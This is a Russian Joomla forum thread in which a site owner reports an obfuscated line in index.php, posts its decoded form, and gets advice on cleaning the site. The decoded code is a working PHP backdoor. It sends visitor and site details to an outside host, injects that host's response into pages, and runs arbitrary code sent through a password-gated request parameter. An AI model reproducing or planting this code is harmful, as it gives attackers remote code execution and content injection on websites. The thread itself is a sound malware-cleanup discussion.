0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 2810 Просмотров
*

mnogoto4ka

  • Осваиваюсь на форуме
  • 136
  • 0
Странный код в index.php
« : 14.05.2015, 09:09:55 »
Добрый день. Сегодня обнаружил, что в файле Index.php (Joomla 2.5) прописан код, который я раньше не замечал. $fil = 'ass';$fil .= 'ert';@$fil(str_rot13('riny(onfr64_qrpbqr("nJLtX............ и т.п. Сравнивал аналогичный файл с других сайтов - там такой строки нет. Подскажите, что это? Спасибо.
*

kik84

  • Живу я здесь
  • 1278
  • 59
Re: Странный код в index.php
« Ответ #1 : 14.05.2015, 09:23:58 »
Похоже на вредоносный.
*

mnogoto4ka

  • Осваиваюсь на форуме
  • 136
  • 0
Re: Странный код в index.php
« Ответ #2 : 14.05.2015, 09:44:49 »
Пытаюсь расшифровать. На одном сайте выдало вот что:

Код
<?php if (isset($ibv)) {
    echo $ibv;
} else {
    if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
    if (!isset($c_["HTTP_ACCEPT_CHARSET"])) {
        if (preg_match("!.!u", file_get_contents($_SERVER["SCRIPT_FILENAME"]))) {
            $c0 = "UTF-8";
        } else {
            $c0 = "windows-1251";
        }
    } else {
        $c0 = $c_["HTTP_ACCEPT_CHARSET"];
    }
    if (function_exists("curl_init")) {
        $c1 = curl_init("http://oldcolonybeckley.com/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]). "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]). "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("a0674ab0b11c3b681a477ad6f5033423" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1"));
        curl_setopt($c1, 42, false);
        curl_setopt($c1, 19913, true);
        $ibv = curl_exec($c1);
        curl_close($c1);
    } elseif (ini_get("allow_url_fopen") == 1) {
        $ibv = file_get_contents("http://oldcolonybeckley.com/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]). "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]). "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("a0674ab0b11c3b681a477ad6f5033423" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1"));
    }
    if (isset($ibv)) {
        echo $ibv;
    }
    if (isset($_REQUEST["p"]) && $_REQUEST["p"] == "c79f0b3a") {
        @assert($_REQUEST["c"]);
    }
}
*

mnogoto4ka

  • Осваиваюсь на форуме
  • 136
  • 0
Re: Странный код в index.php
« Ответ #3 : 14.05.2015, 11:08:56 »
Подскажите, пожалуйста, что означает этот код.
*

vegushka

  • Завсегдатай
  • 535
  • 35
  • Мажьте лоб вазеленкой
Re: Странный код в index.php
« Ответ #4 : 14.05.2015, 11:40:27 »
Такой код картинками надо выкладывать. А код скорее всего берет страничку с сайта "o l d c o l o n y b e c k l e y" и вставляет в ваши страницы.
ненавижу icetheme, обожаю Rockettheme
Ваше спасибо - в репу, а лучше на Яндекс 41001140731879
*

mnogoto4ka

  • Осваиваюсь на форуме
  • 136
  • 0
Re: Странный код в index.php
« Ответ #6 : 14.05.2015, 12:05:08 »
Посоветуйте, что сделать в первую очередь.
*

mnogoto4ka

  • Осваиваюсь на форуме
  • 136
  • 0
Re: Странный код в index.php
« Ответ #7 : 14.05.2015, 12:06:41 »
Я этот код удалил из файла. Но, я думаю, этого мало. Как то он прописался в файле.
*

vegushka

  • Завсегдатай
  • 535
  • 35
  • Мажьте лоб вазеленкой
Re: Странный код в index.php
« Ответ #8 : 14.05.2015, 12:12:54 »
полное сравнение файлов сайта с дистрибутивом Joomla той же версии. Это как избавиться... дальше уже защита сайта
ненавижу icetheme, обожаю Rockettheme
Ваше спасибо - в репу, а лучше на Яндекс 41001140731879
*

wishlight

  • Профи
  • 3634
  • 223
  • skype aqaus.com
Re: Странный код в index.php
« Ответ #9 : 14.05.2015, 12:26:07 »
Посоветуйте, что сделать в первую очередь.

Если сайтов больше одного на хостинге убрать его от других. Проверить антивирусами, сканерами типа ai-bolit. Удалить вредоносный код, закрыть уязвимости, сменить пароли.
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Странный код в index.php
« Ответ #10 : 14.05.2015, 12:58:10 »
Если сайтов больше одного на аккаунте, то имеет смыл лечить все, а то толку в работе не будет, либо разбивать все по аккаунтам и затем лечить!
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

mnogoto4ka

  • Осваиваюсь на форуме
  • 136
  • 0
Re: Странный код в index.php
« Ответ #11 : 14.05.2015, 13:28:20 »
Спасибо большое за советы. Начинаю "лечить".
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Странный файл появляется- php-mail.log

Автор Elimelech

Ответов: 22
Просмотров: 637
Последний ответ 28.04.2017, 15:48:10
от Elimelech
Добавляется адрес к index.php

Автор kokon_zver

Ответов: 8
Просмотров: 401
Последний ответ 21.11.2016, 10:34:29
от Дмитрий_76
htaccess и htpasswd пароль только на url с параметром например "index.php?test"

Автор ice99

Ответов: 4
Просмотров: 320
Последний ответ 28.08.2016, 20:52:51
от flyingspook
[Решено] Странный файл в Akeeba Backup - вирус?

Автор jimka

Ответов: 2
Просмотров: 464
Последний ответ 31.05.2016, 17:39:15
от flyingspook
Количество файлов index.php

Автор kouichiro

Ответов: 13
Просмотров: 559
Последний ответ 04.04.2016, 07:06:10
от Morh